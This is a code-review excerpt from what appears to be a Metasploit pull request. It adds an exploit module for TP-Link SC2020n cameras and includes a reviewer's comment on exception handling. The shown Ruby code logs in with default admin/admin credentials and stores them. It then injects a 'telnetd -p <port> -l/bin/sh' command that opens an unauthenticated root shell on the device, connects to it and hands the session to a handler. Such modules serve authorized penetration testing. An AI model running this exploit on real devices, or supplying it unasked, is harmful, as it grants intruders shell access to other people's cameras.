modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb

```diff
@@ -0,0 +1,204 @@
+            [
+              [  'Automatic',     { } ],
+            ],
+          'DefaultTarget'  => 0
+         ))
+
+        register_options(
+          [
+            OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+            OptString.new('PASSWORD', [ true, 'Password to login with', 'admin'])
+          ], self.class)
+
+        register_advanced_options(
+          [
+            OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]),
+            OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+          ], self.class)
+    end
+
+    def telnet_timeout
+      (datastore['TelnetTimeout'] || 10).to_i
+    end
+
+    def banner_timeout
+      (datastore['TelnetBannerTimeout'] || 25).to_i
+    end
+
+    def exploit
+      print_status('Exploiting')
+      user = datastore['USERNAME']
+      pass = datastore['PASSWORD']
+      test_login(user, pass)
+      exploit_telnet
+    end
+
+
+    def test_login(user, pass)
+        print_status("Trying to login with #{user} : #{pass}")
+        begin
+          res = send_request_cgi({
+            'uri' => '/',
+            'method' => 'GET',
+            'authorization' => basic_auth(user, pass)
+          })
+
+          if res.nil?
+            fail_with(Failure::Unknown, "Could not connect to web service - no response")
+          end
+
+          if (res.code != 200)
+            fail_with(Failure::Unknown, "Could not connect to web service - invalid credentials (response code: #{res.code}")
+          else
+            print_good("Successful login #{user} : #{pass}")
+            save_cred(user, pass)
+          end
+        rescue ::Rex::ConnectionError
+          fail_with(Failure::Unknown, "Could not connect to the web service")
+        end
+    end
+
+    def exploit_telnet
+        telnet_port = rand(32767) + 32768
+
+        print_status("Telnet Port: #{telnet_port}")
+
+        cmd = "telnetd -p #{telnet_port} -l/bin/sh"
+
+        telnet_request(cmd)
+
+        print_status("Trying to establish telnet connection...")
+        ctx = { 'Msf' => framework, 'MsfExploit' => self }
+        sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout })
+
+        begin
+          if sock.nil?
+            fail_with(Failure::Unreachable, "Backdoor service unreachable")
+          end
+
+          add_socket(sock)
+
+          print_status("Trying to establish a telnet session...")
+          prompt = negotiate_telnet(sock)
+
+          if prompt.nil?
+            sock.close
+            fail_with(Failure::Unknown, "Unable to establish a telnet session")
+          else
+            print_good("Telnet session successfully established")
+          end
+
+          handler(sock)
+        rescue
+          fail_with(Failure::Unknown, "Unknown error")
+          sock.close
```

Comment:
> adding it in the ensure will close the telnet session even if the exploit is successful. Or am I misunderstanding what you are saying?

Ah ok, sorry I failed to pay attention to that.

Ok in that case I think you can probably just do:

```ruby
begin
  ....
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
  sock.close if sock
  fail_with(Failure::Unknown, e.message)
end
```